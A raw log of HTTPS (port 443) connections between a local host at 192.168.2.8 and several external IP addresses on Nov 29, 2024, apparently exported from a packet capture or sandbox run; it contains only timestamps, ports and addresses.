Nov 29, 2024 12:28:08.411509037 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.411788940 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.411856890 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.412053108 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.412064075 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.412092924 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.412188053 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.412194967 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.412323952 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.412331104 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.455331087 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.457178116 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.457216978 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.457216978 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.759819031 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:08.759850979 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:08.759984970 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:08.760174990 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:08.760190010 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:08.855335951 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.855355024 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.855412960 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.855441093 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.856205940 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.856266975 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.891143084 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.891156912 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.891228914 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.891247988 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.891577005 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.891621113 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.891680002 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.892265081 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.892277956 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.947556019 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.947592020 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.947644949 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.947664976 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.947876930 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.948079109 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.948570967 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.948579073 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.948613882 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.948633909 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.948931932 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.948959112 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.949026108 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.949426889 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.949440956 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.090703964 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.090728045 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.090800047 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.090828896 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.092111111 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.092159033 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.092227936 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.096055984 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.096080065 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.096127987 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.096142054 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.096210003 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.096324921 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.125150919 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.125189066 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.125201941 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.125443935 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.154905081 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.157974958 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.158039093 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.158067942 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.158126116 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.158404112 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.158549070 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.158565044 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.158595085 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.158611059 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.170595884 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.170624018 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.170681000 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.170713902 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.172374010 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.172419071 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:09.172462940 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:09.236834049 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.236871958 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:09.236942053 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.240905046 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.240942955 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:09.241003990 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.241615057 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.241622925 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:09.241794109 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.241955996 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.241974115 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:09.244656086 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:09.244673014 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:09.244848967 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.244860888 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:09.246619940 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.246645927 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:09.246814966 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.246984959 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:09.246999025 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:09.397130966 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.397231102 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.397413969 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.397413969 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.400383949 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.400413990 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.410855055 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.411561012 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.411576033 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.412625074 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.412796974 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.414194107 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.414267063 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.414649010 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.414659023 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.440040112 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.458254099 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.458272934 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.458422899 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.459434986 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.459500074 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.468808889 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.468905926 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.469046116 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.469064951 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.469079971 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.469136000 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.499844074 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.500205040 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.501408100 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.501432896 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.501784086 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.501816034 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.501838923 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.502160072 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.503931999 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.504040003 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.506221056 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.506294012 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.506511927 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.506575108 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.509603977 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.509639025 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.509736061 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.510200977 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.510215044 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.519431114 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.544455051 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.545645952 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.545666933 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.546720028 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.546785116 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.547341108 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.547455072 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.547521114 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.548192024 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.548199892 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.551326036 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.591536999 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.591759920 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.591780901 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.592739105 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.592878103 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.593000889 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.593075037 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.593085051 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.593475103 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.593539953 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.593631029 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.594166040 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.594243050 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.594564915 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.594643116 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.594708920 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.597666979 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.606775045 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.606939077 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.607563972 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.607573986 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.632534027 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.632544041 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.632652998 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.632669926 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.632814884 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.632832050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.632998943 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633018970 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633141041 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633153915 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633502007 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633510113 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633562088 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633570910 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633590937 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633599997 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633621931 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633635044 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633646965 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633666992 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633826017 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633835077 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633873940 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633882046 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633898973 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633919001 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633932114 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633939981 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633953094 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633960962 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633975983 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633982897 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.633994102 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.633997917 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634008884 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634013891 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634030104 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634047031 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634064913 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634073019 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634090900 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634109020 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634121895 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634130955 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634145021 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634150982 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634171009 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634171009 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634181023 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634196997 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634246111 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634257078 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634268045 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634274960 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634293079 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634300947 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634309053 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634315014 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634329081 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634329081 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634339094 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634346962 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634371996 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634387970 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634402037 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634409904 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634424925 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634430885 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634439945 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634448051 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.634460926 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634480953 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634489059 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634516001 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634541035 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634547949 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634553909 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634582043 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634582043 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634598970 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634598970 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634624004 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634641886 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634851933 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634927034 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634964943 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.634975910 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635015965 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635030985 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635073900 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635088921 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635107994 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635123968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.635334015 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.635334015 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.644865990 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.644880056 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.644916058 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.644937992 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.679325104 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.679621935 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679645061 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679673910 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679789066 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679797888 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679821968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679836035 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679891109 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679905891 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679944038 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679953098 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679972887 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.679990053 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680008888 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680021048 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680021048 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680046082 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680063009 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680073023 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680079937 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680088997 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.680130005 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.691232920 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.691293955 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.727341890 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.727535963 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727562904 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727577925 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727598906 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727641106 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727679968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.727690935 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.771327972 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.815565109 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:09.817447901 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:09.817478895 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:09.817872047 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:09.818190098 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:09.818254948 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:09.818703890 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:09.859332085 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:09.874200106 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.874368906 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.874385118 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.874861002 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.913817883 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.913901091 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.914006948 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.914855957 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.914875984 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.915328026 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.915465117 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.919472933 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.919503927 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.919576883 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.919940948 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:09.919950008 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:09.935492039 CET	443	49812	104.117.182.56	192.168.2.8
